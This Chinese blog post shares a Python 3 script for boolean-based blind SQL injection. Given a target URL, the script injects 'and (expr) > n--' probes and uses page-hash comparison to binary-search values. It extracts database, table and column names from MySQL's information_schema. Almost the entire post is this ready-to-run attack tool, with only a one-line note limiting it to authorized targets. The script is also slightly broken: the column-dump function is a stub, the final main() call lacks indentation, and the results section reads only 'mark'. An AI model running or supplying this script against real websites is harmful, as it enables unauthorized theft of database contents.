python脚本实现半自动化布尔盲注

贴一个python写的布尔盲注脚本,就当保存代码了,以后可以回头参考参考。

运行环境:python3,另需第三方库 requests(`pip install requests`);脚本只适用于经授权的测试目标。

代码:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from optparse import OptionParser
import sys
import requests
import hashlib

parser=OptionParser()

parser.add_option("-D", "--database", action="store",type="string",dest="database",help="Please input test databases")
parser.add_option("-T", "--table",action="store",type="string",dest="table",help="Please input test table")
parser.add_option("-C", "--column",action="store",type="string",dest="column",help="Please input test column")
parser.add_option("-U","--url", action="store",type="string",dest="url",help="Please input test url")

(options,args) = parser.parse_args()

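def main():
    """Dispatch on which options were supplied.

    -U alone enumerates databases; adding -D lists that database's tables;
    adding -T lists the table's columns; adding -C as well hands off to
    getAllContent.  Any other combination (no URL, or -T without -D, ...)
    prints the help text and exits instead of silently doing nothing, which
    is what the original chain of elif branches did.
    """
    url = options.url
    database = options.database
    table = options.table
    column = options.column

    # The URL is the one mandatory option; every branch below needs it.
    if url is None:
        print("Please read the help")
        parser.print_help()
        sys.exit()

    if database is None and table is None and column is None:
        get_all_databases(url)
    elif database is not None and table is None and column is None:
        get_db_all_tables(url, database)
    elif database is not None and table is not None and column is None:
        get_db_tb_all_columns(url, database, table)
    elif database is not None and table is not None and column is not None:
        getAllContent(url, database, table, column)
    else:
        # e.g. -T without -D: the narrowing options must be given in order.
        print("Please read the help")
        parser.print_help()
        sys.exit()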



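# One session so keep-alive connections are reused across the thousands of
# requests a blind-injection run makes.
_session = requests.Session()


def http_get(url, timeout=10):
    """GET *url* and return the raw response body as bytes.

    Args:
        url: full URL, including the payload half() appended.
        timeout: seconds to wait for connect/read.  The original had no
            timeout, so a stalled target hung the whole run.

    Returns:
        The response body as ``bytes`` (what md5() expects).  Non-2xx
        statuses are deliberately NOT raised: an error page is a valid
        "condition false" signal for the boolean oracle in half().
    """
    result = _session.get(url, timeout=timeout)
    return result.content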

def get_all_databases(url):
    """Enumerate every schema name visible in information_schema.schemata.

    Each name is recovered one character at a time through half(), so a
    schema of length k costs roughly 8*k requests on top of the count and
    length probes.  Results are printed, not returned.
    """
    count_query = "select count(schema_name) from information_schema.schemata"
    total = half(url, count_query)
    print("数据库的总个数为:%d" % total)

    for index in range(total):
        length_query = "select length(schema_name) from information_schema.schemata limit %d,1" % index
        name_length = half(url, length_query)

        # substr() positions are 1-based; one probe per character.
        name = "".join(
            chr(half(url, "ascii(substr((select schema_name from information_schema.schemata limit %d,1),%d,1))" % (index, position)))
            for position in range(1, name_length + 1)
        )
        print("第%d个数据库为:%s" % (index + 1, name))



def get_db_all_tables(url, database):
    """Print every table name in *database*, recovered char by char via half().

    NOTE: *database* is spliced into a single-quoted SQL literal as-is; a name
    containing a quote breaks the payload rather than being escaped.
    """
    count_query = "select count(table_name) from information_schema.tables where table_schema = '%s'" % database
    total = half(url, count_query)
    print("%s数据库中的表个数为:%d" % (database, total))

    for index in range(total):
        length_query = "select length(table_name) from information_schema.tables where table_schema = '%s' limit %d,1" % (database, index)
        name_length = half(url, length_query)

        # substr() positions are 1-based; one probe per character.
        name = "".join(
            chr(half(url, "ascii(substr((select table_name from information_schema.tables where table_schema = '%s' limit %d,1),%d,1))" % (database, index, position)))
            for position in range(1, name_length + 1)
        )
        print(database, "数据库中第%d个表为:%s" % (index + 1, name))



def get_db_tb_all_columns(url, database, table):
    """Print every column name of *database*.*table*, recovered via half().

    NOTE: *database* and *table* are spliced into single-quoted SQL literals
    as-is; a quote in either breaks the payload rather than being escaped.
    """
    count_query = "select count(column_name) from information_schema.columns where table_schema = '%s' and table_name = '%s'" % (database, table)
    total = half(url, count_query)
    print("%s 数据库中的 %s 表中的字段个数为:%d" % (database, table, total))

    for index in range(total):
        length_query = "select length(column_name) from information_schema.columns where table_schema = '%s' and table_name = '%s' limit %d,1" % (database, table, index)
        name_length = half(url, length_query)

        # substr() positions are 1-based; one probe per character.
        name = "".join(
            chr(half(url, "ascii(substr((select column_name from information_schema.columns where table_schema = '%s' and table_name = '%s' limit %d,1),%d,1))" % (database, table, index, position)))
            for position in range(1, name_length + 1)
        )
        print(database, "数据库中", table, "表中第%d个字段名为:%s" % (index + 1, name))



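def getAllContent(url, database, table, column):
    """Placeholder for dumping *column* of *database*.*table* — not implemented.

    main() calls this with four positional arguments, but the original stub
    took none and raised TypeError.  The signature now matches the call so
    the script reports the gap instead of crashing.
    """
    print("getAllContent is not implemented (requested %s.%s.%s)" % (database, table, column))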


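def md5(str):
    """Return the hex MD5 digest of *str*, used only as a page fingerprint.

    MD5 is acceptable here because it is a change detector for the boolean
    oracle, not a security primitive.  (The original comment claimed Python
    has no MD5 function; it is hashlib.md5, used below.)  The parameter name
    shadows the builtin and is kept only so existing callers keep working.

    Args:
        str: response body as bytes (what http_get returns).  A text string
            is accepted too and is UTF-8 encoded first, since hashlib only
            takes bytes-like input.

    Returns:
        32-character lowercase hex digest.
    """
    data = str if isinstance(str, (bytes, bytearray, memoryview)) else str.encode("utf-8")
    return hashlib.md5(data).hexdigest()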


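# Baseline ("condition true") page fingerprint per target URL, fetched once
# rather than on every half() call — saves one request per probed value.
_baseline = {}


def half(url, payload, low=0, high=126):
    """Binary-search the integer value of a SQL expression via a boolean oracle.

    *payload* must be a scalar SQL expression (a subquery or ascii(...)).
    Each probe appends `` and (payload) > mid-- `` to *url* and compares the
    page's MD5 with the baseline page; an identical page means the comparison
    held.  Returns the smallest v in [low, high] consistent with the answers,
    i.e. the expression's value when it lies in that range.

    Args:
        url: injectable URL whose unmodified form renders the "true" page.
        payload: SQL expression to evaluate, injected verbatim.
        low, high: inclusive search bounds; the defaults cover 7-bit ASCII.
            Pass a larger *high* for row counts or for ascii() of multi-byte
            data (MySQL reports the first byte, up to 255).

    Returns:
        int.  Saturates at high+1 when the true value exceeds *high* and at
        *low* when it is below, so callers cannot distinguish "0" from
        "out of range" — keep bounds generous.

    NOTE(review): a whole-page hash is a brittle oracle — any per-request
    dynamic content (timestamps, CSRF tokens, ads) makes every probe look
    "different" and the search collapses to *low*.  Compare a stable
    fragment of the page if results are all 0.
    """
    if url not in _baseline:
        _baseline[url] = md5(http_get(url))
    standard_html = _baseline[url]

    while low <= high:
        # Integer midpoint: the original used "/", which yields floats on
        # Python 3 and let the bounds drift off integer values.
        mid = (low + high) // 2
        probe = url + " and (%s) > %d-- " % (payload, mid)
        if md5(http_get(probe)) == standard_html:
            low = mid + 1   # page unchanged: value > mid
        else:
            high = mid - 1  # page differs: value <= mid
    # Loop exits with high == low - 1; low is the smallest value not ruled out
    # (identical to the original's int((low+high+1)/2) for integer bounds).
    return low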


if __name__ == '__main__':
main()

运行结果:

mark
